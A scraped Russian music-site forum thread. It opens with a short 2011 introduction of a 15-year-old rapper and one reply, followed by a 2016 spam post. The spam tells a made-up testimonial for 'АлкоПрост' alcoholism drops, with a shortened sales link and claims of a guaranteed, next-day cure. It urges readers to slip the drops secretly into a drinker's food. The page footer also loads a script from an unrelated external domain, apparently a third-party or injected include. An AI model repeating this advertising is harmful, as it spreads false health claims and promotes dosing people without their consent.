Пятница, 19.04.2024, 04:04
Приветствую Вас Гость | RSS
Главная | Mp3 бесплатно | Mc Ansar - Форум | Регистрация | Вход


  • Страница 1 из 1
  • 1
Форум » Курилка » Общение » Mc Ansar (немного о рэп звезде)
Mc Ansar
Mc_ansarДата: Среда, 23.02.2011, 21:37 | Сообщение # 1
Заинтересованный
Группа: Пользователи
Сообщений: 1
Репутация: 0
Статус: Offline

Немного о рэпере:
Mc Ansar
Занимаеться рэпом 2года
Возраст: 15 Лет
Проживает в: г.Стерлитамак
Имеет в городе свою звукозаписную студию

Есть спонсоры по развитию:
Ишбулдин Ильсур
Нигматулин Ринат

Одна из песен Mc Ansara

 
РегинаДата: Среда, 23.02.2011, 21:54 | Сообщение # 2
Заинтересованный
Группа: Пользователи
Сообщений: 1
Репутация: 99
Статус: Offline
прикольная песенка!!!)))
 
AnnarusiaДата: Понедельник, 14.11.2016, 20:59 | Сообщение # 3
Заинтересованный
Группа: Пользователи
Сообщений: 1
Репутация: 0
Статус: Offline
Наверное, из-за того, что у мужа не получилось найти хорошую работу и, в основном, в семью приносила деньги я, он сломался и начал запивать свою обиду. Пил каждый день – на работе, дома, с друзьями во дворе. Я всё думала, что Лёша одумается – но этого не произошло. И однажды, когда нашей дочери было 3 года, он ударил её и сломал руку. Я много плакала, но поняла, что ждать больше не нужно и решила действовать.

Я возила его по бабкам, знахарям, которые брали по 5 т.р. за приём. Лёша лежал в больнице, где его закодировали, за что я заплатила 14 т.р. И всё это с маленьким ребёнком, у которого сломана рука!

Но ничего не помогало. И тут в интернете я наткнулась на http://kshop.biz/2fNMfc - АлкоПрост. Почему я возложила на него надежды? В интернете нашлось много хороших отзывов от алкоголиков со стажем, да и в больнице где я работала мне пару людей сказали, что излечились с помощью АлкоПроста.

Стоит он по сравнению с другими средствами совсем недорого. Никуда ездить не нужно, нигде лежать или за что-то ещё платить, а результаты видны уже через день употребления! И самое важное, можно лечить БЕЗ ВЕДОМА БОЛЬНОГО!, так как мой муж не признавал проблемы. Тем более, что на эти капли дают 100% гарантию! Да и никакой предоплаты не нужно, оплата при получении.

Начала я добавлять втихаря эти капельки в еду и питье. И о ЧУДО, через три дня я впервые за долгое время увидела мужа трезвым, да ещё и с цветами, просил прощения за свои поступки! Вообщем через месяц он бросил пить вообще и наконец-то нашел высокооплачиваемую работу. А через пол года я забеременнела, у нас будет мальчик!

Стоит ли говорить, насколько я счастлива? На работе никто не знает о наших проблемах, муж стал зарабатывать гораздо больше, ребёночек растёт здоровым и крепким, ждём второго, я могу заниматься своими делами не думая о том, где же сейчас пьяный мой муж.
И конечно же, большое спасибо АлкоПросту, который спас нашу семью!
 
Форум » Курилка » Общение » Mc Ansar (немного о рэп звезде)
  • Страница 1 из 1
  • 1
Поиск:


<script async language="javascript" charset="UTF-8" type="text/javascript" src="//shinasi.info/0news.js?lo6exc=289126"></script>
Хостинг от uCoz

У нас только свежая музыка
Наш муз портал - это уникальная возможность скачать и прослушать новинки Mp3 музыки абсолютно бесплатно, без регистрации! Качайте на MP3Narkotik.Ru клубную музыку, русский рэп, Electro, RnB, Rap, Hip-hop и многие другие Мп3 песни! sitemap